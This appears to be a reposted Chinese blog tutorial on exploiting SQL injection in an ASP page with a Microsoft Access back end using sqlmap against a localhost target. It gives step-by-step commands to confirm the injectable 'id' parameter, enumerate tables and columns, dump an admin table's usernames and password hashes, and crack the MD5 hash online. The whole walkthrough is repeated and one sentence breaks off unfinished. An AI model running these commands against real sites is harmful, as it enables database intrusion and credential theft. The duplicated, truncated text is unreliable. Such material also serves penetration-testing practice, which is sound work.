sqlmap之(三)----Access注入实战
2017-02-27 15:56
357 查看
(1) 猜解是否能注入
sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513"
it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
它后端DBMS看起来像是“Microsoft Access”。 是否要跳过特定于其他DBMS的测试有效内容
输入"Y"。
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)?
GET参数'id'是脆弱的。 你想要继续测试其他人(如果有的话)
输入"Y"。
猜出来的数据库是"Microsoft Access"数据库。
(2) 猜解表
sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" --tables
do you want to use common table existence check? [Y/n/q]
是否要使用公共表存在检查存在? 输入"Y"
please enter number of threads? [Enter for 1 (current)] 请输入线程数? [输入 1 (当前)]
然后要你输入线程数,这里输入10,线程数不能输入过大,否则会提示错误。
猜解成功后得出的表。
(3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)
sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" --columns -T admin
do you want to use common column existence check? [Y/n/q] 你想使用公共列存在检查吗?[Y/n/q]
输入"Y"。然后输入线程数
一番等待结果就出来了。
(4) 根据字段猜解内容(假如通过3得到字段为admin和password)
他会询问你: do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
你想存储的哈希值来与其他工具最终进一步处理临时文件?
输入"Y";
然后他又会询问你: do you want to crack them via a dictionary-based attack? [Y/n/q]
你想通过基于字典的攻击来破解他们吗?
输入"N"; 使用它自带的
用户名与密码就出来了。密码是MD5加密的: a48e190fafc257d3 放到网上去解密,解密之后得到的结果为
sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513"
it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
它后端DBMS看起来像是“Microsoft Access”。 是否要跳过特定于其他DBMS的测试有效内容
输入"Y"。
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)?
GET参数'id'是脆弱的。 你想要继续测试其他人(如果有的话)
输入"Y"。
猜出来的数据库是"Microsoft Access"数据库。
(2) 猜解表
sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" --tables
do you want to use common table existence check? [Y/n/q]
是否要使用公共表存在检查存在? 输入"Y"
please enter number of threads? [Enter for 1 (current)] 请输入线程数? [输入 1 (当前)]
然后要你输入线程数,这里输入10,线程数不能输入过大,否则会提示错误。
猜解成功后得出的表。
(3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)
sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" --columns -T admin
do you want to use common column existence check? [Y/n/q] 你想使用公共列存在检查吗?[Y/n/q]
输入"Y"。然后输入线程数
一番等待结果就出来了。
(4) 根据字段猜解内容(假如通过3得到字段为admin和password)
他会询问你: do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
你想存储的哈希值来与其他工具最终进一步处理临时文件?
输入"Y";
然后他又会询问你: do you want to crack them via a dictionary-based attack? [Y/n/q]
你想通过基于字典的攻击来破解他们吗?
输入"N"; 使用它自带的
用户名与密码就出来了。密码是MD5加密的: a48e190fafc257d3 放到网上去解密,解密之后得到的结果为
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- sqlmap之(四)----Mysql注入实战
- sqlmap cookie注入实战
- 【实战分享】sqlmap显示有注入却无法爆出库名
- SQLmap注入学习实战 —— dvwa 从low到impossble
- SQLmap注入学习实战 —— 宽字节注入与sqlmap进阶玩法
- sqlmap之(六)----POST登陆框注入实战
- DVWA+SQLmap+Mysql注入实战
- 使用sqlmap 代替access 注入中转
- sqlmap注入Access
- 1.羽翼sqlmap学习笔记之Access注入
- 偏移注入payload构造技巧实战+Access注入
- sqlmap之(五)----Cookie注入实战
- sqlmap注入Access实例
- SQLMAP自动注入(四):枚举
- sqlmap 注入基本用法
- (转载)使用sqlmap 绕过防火墙进行注入测试
- 【Spring实战】—— 2 构造注入
- 【Spring实战】—— 5 设值注入
- oracle数据库注入实战
- 搭建Mutillidae使用sqlmap注入测试